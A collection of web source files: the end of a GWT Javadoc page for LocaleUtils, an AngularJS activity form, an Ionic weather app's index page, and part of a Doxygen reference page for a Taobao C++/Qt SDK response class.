<TD><CODE><B><A HREF="../../../../../com/google/gwt/i18n/rebind/LocaleUtils.html#getInstance(com.google.gwt.core.ext.TreeLogger, com.google.gwt.core.ext.PropertyOracle, com.google.gwt.core.ext.GeneratorContext)">getInstance</A></B>(<A HREF="../../../../../com/google/gwt/core/ext/TreeLogger.html" title="class in com.google.gwt.core.ext">TreeLogger</A> logger,
<A HREF="../../../../../com/google/gwt/core/ext/PropertyOracle.html" title="interface in com.google.gwt.core.ext">PropertyOracle</A> propertyOracle,
<A HREF="../../../../../com/google/gwt/core/ext/GeneratorContext.html" title="interface in com.google.gwt.core.ext">GeneratorContext</A> context)</CODE>
<BR>
Create a new LocaleUtils instance for the given PropertyOracle.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static <A HREF="../../../../../com/google/gwt/i18n/shared/GwtLocaleFactory.html" title="interface in com.google.gwt.i18n.shared">GwtLocaleFactory</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../com/google/gwt/i18n/rebind/LocaleUtils.html#getLocaleFactory()">getLocaleFactory</A></B>()</CODE>
<BR>
Get a shared GwtLocale factory so instances are cached between all uses.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../com/google/gwt/i18n/rebind/LocaleUtils.html#getQueryParam()">getQueryParam</A></B>()</CODE>
<BR>
Return the name of the URL query param to potentially get the locale value
from.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.util.Set<<A HREF="../../../../../com/google/gwt/i18n/shared/GwtLocale.html" title="interface in com.google.gwt.i18n.shared">GwtLocale</A>></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../../com/google/gwt/i18n/rebind/LocaleUtils.html#getRuntimeLocales()">getRuntimeLocales</A></B>()</CODE>
<BR>
Returns a list of locales which are children of the current compile-time
locale.</TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from class java.lang.Object</B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</CODE></TD>
</TR>
</TABLE>
<P>
<!-- ============ FIELD DETAIL =========== -->
<A NAME="field_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Field Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="PROP_LOCALE"><!-- --></A><H3>
PROP_LOCALE</H3>
<PRE>
static final java.lang.String <B>PROP_LOCALE</B></PRE>
<DL>
<DD>The token representing the locale property controlling Localization.
<P>
<DL>
<DT><B>See Also:</B><DD><A HREF="../../../../../constant-values.html#com.google.gwt.i18n.rebind.LocaleUtils.PROP_LOCALE">Constant Field Values</A></DL>
</DL>
<HR>
<A NAME="PROP_LOCALE_QUERY_PARAM"><!-- --></A><H3>
PROP_LOCALE_QUERY_PARAM</H3>
<PRE>
static final java.lang.String <B>PROP_LOCALE_QUERY_PARAM</B></PRE>
<DL>
<DD>The config property identifying the URL query paramter name to possibly get
the value of the locale property.
<P>
<DL>
<DT><B>See Also:</B><DD><A HREF="../../../../../constant-values.html#com.google.gwt.i18n.rebind.LocaleUtils.PROP_LOCALE_QUERY_PARAM">Constant Field Values</A></DL>
</DL>
<HR>
<A NAME="PROP_LOCALE_COOKIE"><!-- --></A><H3>
PROP_LOCALE_COOKIE</H3>
<PRE>
static final java.lang.String <B>PROP_LOCALE_COOKIE</B></PRE>
<DL>
<DD>The config property identifying the cookie name to possibly get the value
of the locale property.
<P>
<DL>
<DT><B>See Also:</B><DD><A HREF="../../../../../constant-values.html#com.google.gwt.i18n.rebind.LocaleUtils.PROP_LOCALE_COOKIE">Constant Field Values</A></DL>
</DL>
<HR>
<A NAME="PROP_RUNTIME_LOCALES"><!-- --></A><H3>
PROP_RUNTIME_LOCALES</H3>
<PRE>
static final java.lang.String <B>PROP_RUNTIME_LOCALES</B></PRE>
<DL>
<DD>The token representing the runtime.locales configuration property.
<P>
<DL>
<DT><B>See Also:</B><DD><A HREF="../../../../../constant-values.html#com.google.gwt.i18n.rebind.LocaleUtils.PROP_RUNTIME_LOCALES">Constant Field Values</A></DL>
</DL>
<!-- ============ METHOD DETAIL ========== -->
<A NAME="method_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Method Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="getInstance(com.google.gwt.core.ext.TreeLogger, com.google.gwt.core.ext.PropertyOracle, com.google.gwt.core.ext.GeneratorContext)"><!-- --></A><H3>
getInstance</H3>
<PRE>
public static <A HREF="../../../../../com/google/gwt/i18n/rebind/LocaleUtils.html" title="class in com.google.gwt.i18n.rebind">LocaleUtils</A> <B>getInstance</B>(<A HREF="../../../../../com/google/gwt/core/ext/TreeLogger.html" title="class in com.google.gwt.core.ext">TreeLogger</A> logger,
<A HREF="../../../../../com/google/gwt/core/ext/PropertyOracle.html" title="interface in com.google.gwt.core.ext">PropertyOracle</A> propertyOracle,
<A HREF="../../../../../com/google/gwt/core/ext/GeneratorContext.html" title="interface in com.google.gwt.core.ext">GeneratorContext</A> context)</PRE>
<DL>
<DD>Create a new LocaleUtils instance for the given PropertyOracle. Returned
instances will be immutable and can be shared across threads.
<P>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>logger</CODE> - <DD><CODE>propertyOracle</CODE> -
<DT><B>Returns:</B><DD>LocaleUtils instance</DL>
</DD>
</DL>
<HR>
<A NAME="getLocaleFactory()"><!-- --></A><H3>
getLocaleFactory</H3>
<PRE>
public static <A HREF="../../../../../com/google/gwt/i18n/shared/GwtLocaleFactory.html" title="interface in com.google.gwt.i18n.shared">GwtLocaleFactory</A> <B>getLocaleFactory</B>()</PRE>
<DL>
<DD>Get a shared GwtLocale factory so instances are cached between all uses.
<P>
<DD><DL>
<DT><B>Returns:</B><DD>singleton GwtLocaleFactory instance.</DL>
</DD>
</DL>
<HR>
<A NAME="getAllCompileLocales()"><!-- --></A><H3>
getAllCompileLocales</H3>
<PRE>
public java.util.Set<<A HREF="../../../../../com/google/gwt/i18n/shared/GwtLocale.html" title="interface in com.google.gwt.i18n.shared">GwtLocale</A>> <B>getAllCompileLocales</B>()</PRE>
<DL>
<DD>Returns the set of all compile-time locales.
<P>
<DD><DL>
<DT><B>Returns:</B><DD>unmodifiable set of all compile-time locales</DL>
</DD>
</DL>
<HR>
<A NAME="getAllLocales()"><!-- --></A><H3>
getAllLocales</H3>
<PRE>
public java.util.Set<<A HREF="../../../../../com/google/gwt/i18n/shared/GwtLocale.html" title="interface in com.google.gwt.i18n.shared">GwtLocale</A>> <B>getAllLocales</B>()</PRE>
<DL>
<DD>Returns the set of all available locales, whether compile-time locales or
runtime locales.
<P>
<DD><DL>
<DT><B>Returns:</B><DD>unmodifiable set of all locales</DL>
</DD>
</DL>
<HR>
<A NAME="getCompileLocale()"><!-- --></A><H3>
getCompileLocale</H3>
<PRE>
public <A HREF="../../../../../com/google/gwt/i18n/shared/GwtLocale.html" title="interface in com.google.gwt.i18n.shared">GwtLocale</A> <B>getCompileLocale</B>()</PRE>
<DL>
<DD>Returns the static compile-time locale for this permutation.
<P>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="getCookie()"><!-- --></A><H3>
getCookie</H3>
<PRE>
public java.lang.String <B>getCookie</B>()</PRE>
<DL>
<DD>Return the name of the cookie to potentially get the locale value from.
<P>
<DD><DL>
<DT><B>Returns:</B><DD>the cookie name or null if none</DL>
</DD>
</DL>
<HR>
<A NAME="getQueryParam()"><!-- --></A><H3>
getQueryParam</H3>
<PRE>
public java.lang.String <B>getQueryParam</B>()</PRE>
<DL>
<DD>Return the name of the URL query param to potentially get the locale value
from.
<P>
<DD><DL>
<DT><B>Returns:</B><DD>the URL query param or null if none</DL>
</DD>
</DL>
<HR>
<A NAME="getRuntimeLocales()"><!-- --></A><H3>
getRuntimeLocales</H3>
<PRE>
public java.util.Set<<A HREF="../../../../../com/google/gwt/i18n/shared/GwtLocale.html" title="interface in com.google.gwt.i18n.shared">GwtLocale</A>> <B>getRuntimeLocales</B>()</PRE>
<DL>
<DD>Returns a list of locales which are children of the current compile-time
locale.
<P>
<DD><DL>
<DT><B>Returns:</B><DD>unmodifiable list of matching locales</DL>
</DD>
</DL>
<!-- ========= END OF CLASS DATA ========= -->
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/LocaleUtils.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
GWT 2.6.0</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV CLASS
NEXT CLASS</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../index.html?com/google/gwt/i18n/rebind/LocaleUtils.html" target="_top"><B>FRAMES</B></A>
<A HREF="LocaleUtils.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | <A HREF="#field_summary">FIELD</A> | CONSTR | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: <A HREF="#field_detail">FIELD</A> | CONSTR | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
|
views/atividade/form.html | dolalima/acadcoop | <div class="container-fluid" ng-controller="AtividadeCadastroController as cadastro">
<div class="row">
<section class="col col-xs-12">
<div class="panel panel-default">
<!-- Default panel contents -->
<div class="panel-heading"><i class="glyphicon glyphicon-education"></i> Editar Atividades</div>
<div class="panel-body no-padding">
<form class="smart-form">
<fieldset>
<div class="row">
<section class="col col-xs-8">
<label class="label">Nome:</label>
<label class="input">
<input type="text" ng-model="cadastro.entidade.nome">
</label>
</section>
<section class="col col-xs-4">
<label class="label">Data Entrega:</label>
<label class="input">
<input type="date" ng-model="cadastro.entidade.dateEntrega">
</label>
</section>
</div>
<div class="row">
<section class="col col-xs-12">
<label class="label">Descrição:</label>
<label class="select">
<select name="" >
<option ng-repeat="disciplina in cadastro.disciplinas">{{disciplina.nome}}</option>
</select>
<i></i>
</label>
</section>
</div>
<div class="row">
<section class="col col-xs-12">
<label class="label">Descrição:</label>
<label class="input">
<input type="text" ng-model="cadastro.entidade.descricao">
</label>
</section>
</div>
</fieldset>
<footer>
<button class="btn btn-primary"><i class="glyphicon glyphicon-floppy-save"></i> Salvar</button>
</footer>
</form>
</div>
</div>
</section>
</div>
</div> |
www/index.html | JonidBendo/ionweather | <html ng-app="ionic.weather">
<head>
<meta charset="utf-8">
<title>Weather</title>
<!-- Sets initial viewport load and disables zooming -->
<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no">
<link rel="stylesheet" href="lib/css/ionic.css">
<link rel="stylesheet" href="css/app.css">
<link href="lib/ionic-datepicker/dist/style.css" rel="stylesheet">
<script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyDC5bKYpGpjPNYh2HmekEMd0ulQe0gF63A"></script>
<script src="lib/js/ionic.bundle.js"></script>
<script src="lib/js/angular/angular-resource.js"></script>
<script src="js/services.js"></script>
<script src="js/filters.js"></script>
<script src="js/directives.js"></script>
<script src="js/app.js"></script>
<script src="lib/ionic-datepicker/dist/templates.js"></script>
<script src="lib/ionic-datepicker/dist/ionic-datepicker.js"></script>
<!-- <script src="cordova.js"></script> -->
</head>
<body ng-controller="WeatherCtrl">
<ion-pane id="wrapper">
<background-cycler class="bg-fade"></background-cycler>
<ion-header-bar id="header" class="bar bar-header bar-clear">
<h1 class="title">
<span class="city"><i id="city-nav-icon" class="icon ion-navigate"></i> {{currentLocationString}}</span><br>
<current-time localtz="current.local_tz_short"></current-time>
</h1>
<button ng-click="showSettings()" class="button button-icon"><i class="icon ion-gear-a"></i></button>
</ion-header-bar>
<ion-content scroll-event-interval="20" scroll-effects scrollbar-y="false" class="no-header">
<ion-refresher on-refresh="refresh()"></ion-refresher>
<div id="main-content">
<current-weather></current-weather>
<forecast></forecast>
<div id="map" data-tap-disabled="true"></div>
</div>
</ion-content>
</ion-pane>
<script id="settings.html" type="text/ng-template">
<div id="settings-modal" class="modal" ng-controller="SettingsCtrl">
<ion-header-bar class="bar bar-header bar-dark">
<h1 class="title">Settings</h1>
<button class="button button-clear" ng-click="closeSettings()">Close</button>
</ion-header-bar>
<ion-content has-header="true">
<div class="padding">
<div class="list">
<label class="item item-input">
<span class="input-label">Units</span>
<ion-radio-buttons>
<button class="button button-positive button-radio" ng-click="changeUnits('us')">°F</button>
<button class="button button-positive button-radio" ng-click="changeUnits('si')">°C</button>
</ion-radio-buttons>
</label>
<label class="item item-input">
<span class="input-label">Select City</span>
<ion-select ng-repeat="city in cities">
<button class="button button-positive button-radio" ng-click="changeCity('{{city.id}}')">
{{city.name}}
</button>
</ion-select>
</label>
<label class="item item-input">
<span class="input-label">Select Date</span>
<ionic-datepicker idate="currentDate" disablepreviousdates="true" disablefuturedates="false" callback="datePickerCallback" disableddates="disabledDates" title="title" mondayfirst="true">
<button class="button button-block button-positive"> {{ currentDate | date:'dd - MMMM - yyyy' }} </button>
</ionic-datepicker>
</label>
</div>
</div>
</ion-content>
</div>
</script>
</body>
</html>
|
doc/classWlbItemConsignmentDeleteResponse.html | sd44/TaobaoCppQtSDK | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.3.1"/>
<title>Taobao Cpp/Qt SDK: WlbItemConsignmentDeleteResponse Class Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { searchBox.OnSelectItem(0); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">Taobao Cpp/Qt SDK
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.3.1 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="classes.html"><span>Class Index</span></a></li>
<li><a href="inherits.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
<a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark"> </span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark"> </span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark"> </span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark"> </span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark"> </span>Variables</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark"> </span>Pages</a></div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#pub-methods">Public Member Functions</a> |
<a href="#pri-attribs">Private Attributes</a> |
<a href="classWlbItemConsignmentDeleteResponse-members.html">List of all members</a> </div>
<div class="headertitle">
<div class="title">WlbItemConsignmentDeleteResponse Class Reference</div> </div>
</div><!--header-->
<div class="contents">
<p>TOP RESPONSE API: 删除商品的代销关系
<a href="classWlbItemConsignmentDeleteResponse.html#details">More...</a></p>
<p><code>#include <<a class="el" href="WlbItemConsignmentDeleteResponse_8h_source.html">WlbItemConsignmentDeleteResponse.h</a>></code></p>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-methods"></a>
Public Member Functions</h2></td></tr>
<tr class="memitem:a70d76b189dfb81d6540aeae340bb4e69"><td class="memItemLeft" align="right" valign="top">virtual </td><td class="memItemRight" valign="bottom"><a class="el" href="classWlbItemConsignmentDeleteResponse.html#a70d76b189dfb81d6540aeae340bb4e69">~WlbItemConsignmentDeleteResponse</a> ()</td></tr>
<tr class="separator:a70d76b189dfb81d6540aeae340bb4e69"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ab676a0ebc52f4e0c5a57a992a18df9c7"><td class="memItemLeft" align="right" valign="top">QDateTime </td><td class="memItemRight" valign="bottom"><a class="el" href="classWlbItemConsignmentDeleteResponse.html#ab676a0ebc52f4e0c5a57a992a18df9c7">getGmtModified</a> () const </td></tr>
<tr class="separator:ab676a0ebc52f4e0c5a57a992a18df9c7"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a1b38ece6544b8c3861efa6bf4f0a7af7"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classWlbItemConsignmentDeleteResponse.html#a1b38ece6544b8c3861efa6bf4f0a7af7">setGmtModified</a> (QDateTime <a class="el" href="classWlbItemConsignmentDeleteResponse.html#a97ab3526ecbad40349bc3c1df35090d5">gmtModified</a>)</td></tr>
<tr class="separator:a1b38ece6544b8c3861efa6bf4f0a7af7"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:acb6718473bd7d508390c41fa6038c531"><td class="memItemLeft" align="right" valign="top">virtual void </td><td class="memItemRight" valign="bottom"><a class="el" href="classWlbItemConsignmentDeleteResponse.html#acb6718473bd7d508390c41fa6038c531">parseNormalResponse</a> ()</td></tr>
<tr class="separator:acb6718473bd7d508390c41fa6038c531"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="inherit_header pub_methods_classTaoResponse"><td colspan="2" onclick="javascript:toggleInherit('pub_methods_classTaoResponse')"><img src="closed.png" alt="-"/> Public Member Functions inherited from <a class="el" href="classTaoResponse.html">TaoResponse</a></td></tr>
<tr class="memitem:a2e4420f5671664de8a1360866977d28b inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top"> </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a2e4420f5671664de8a1360866977d28b">TaoResponse</a> ()</td></tr>
<tr class="separator:a2e4420f5671664de8a1360866977d28b inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a32ef9c53545a593316521cb1daab3e1a inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">virtual </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a32ef9c53545a593316521cb1daab3e1a">~TaoResponse</a> ()</td></tr>
<tr class="separator:a32ef9c53545a593316521cb1daab3e1a inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:af5a077aab153edf6247200587ee855ee inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#af5a077aab153edf6247200587ee855ee">parseResponse</a> ()</td></tr>
<tr class="separator:af5a077aab153edf6247200587ee855ee inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a174dc083a44795514cfe7a9f14a3731a inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a174dc083a44795514cfe7a9f14a3731a">setParser</a> (<a class="el" href="classParser.html">Parser</a> *parser)</td></tr>
<tr class="separator:a174dc083a44795514cfe7a9f14a3731a inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a854c6fdaef0abbeab21b5a43f65233ea inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a854c6fdaef0abbeab21b5a43f65233ea">parseError</a> ()</td></tr>
<tr class="separator:a854c6fdaef0abbeab21b5a43f65233ea inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ae8f183ea55d76bf813f038aae7022db4 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">QString </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#ae8f183ea55d76bf813f038aae7022db4">getErrorCode</a> () const </td></tr>
<tr class="separator:ae8f183ea55d76bf813f038aae7022db4 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a2468d6e3ad0939ba2f4b12efd1b00413 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a2468d6e3ad0939ba2f4b12efd1b00413">setErrorCode</a> (const QString &<a class="el" href="classTaoResponse.html#ac54f11b3b22a4f93c8587c1f4c3899d7">errorCode</a>)</td></tr>
<tr class="separator:a2468d6e3ad0939ba2f4b12efd1b00413 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:adf75dc6bcbb550c8edb64d33939345ed inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">QString </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#adf75dc6bcbb550c8edb64d33939345ed">getMsg</a> () const </td></tr>
<tr class="separator:adf75dc6bcbb550c8edb64d33939345ed inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a76b9304897ecfc563d8f706d32c01b59 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a76b9304897ecfc563d8f706d32c01b59">setMsg</a> (const QString &<a class="el" href="classTaoResponse.html#adc5e9252ac61126ac2936ab2f6b9a0c6">msg</a>)</td></tr>
<tr class="separator:a76b9304897ecfc563d8f706d32c01b59 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a35fd73600c578a0d5fe9cbe1e1750689 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">QString </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a35fd73600c578a0d5fe9cbe1e1750689">getSubCode</a> () const </td></tr>
<tr class="separator:a35fd73600c578a0d5fe9cbe1e1750689 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a3c6346680f5209b3b9cd7fa0277222e6 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a3c6346680f5209b3b9cd7fa0277222e6">setSubCode</a> (const QString &<a class="el" href="classTaoResponse.html#a5c6f8d740932e6453e7e3a2590fd3e6f">subCode</a>)</td></tr>
<tr class="separator:a3c6346680f5209b3b9cd7fa0277222e6 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a7a0c8be833060f35437f741af784dd69 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">QString </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a7a0c8be833060f35437f741af784dd69">getSubMsg</a> () const </td></tr>
<tr class="separator:a7a0c8be833060f35437f741af784dd69 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a4eac44413ea5445d5cee1e8aac077194 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a4eac44413ea5445d5cee1e8aac077194">setSubMsg</a> (const QString &<a class="el" href="classTaoResponse.html#a13f08fbbfd176df1e06c9dbf579d06f4">subMsg</a>)</td></tr>
<tr class="separator:a4eac44413ea5445d5cee1e8aac077194 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:aff41254c8d0cf4454d663876569379d2 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">bool </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#aff41254c8d0cf4454d663876569379d2">isSuccess</a> ()</td></tr>
<tr class="separator:aff41254c8d0cf4454d663876569379d2 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a92f81ae42b484c9b2258b508e4023068 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">QString </td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a92f81ae42b484c9b2258b508e4023068">getTopForbiddenFields</a> () const </td></tr>
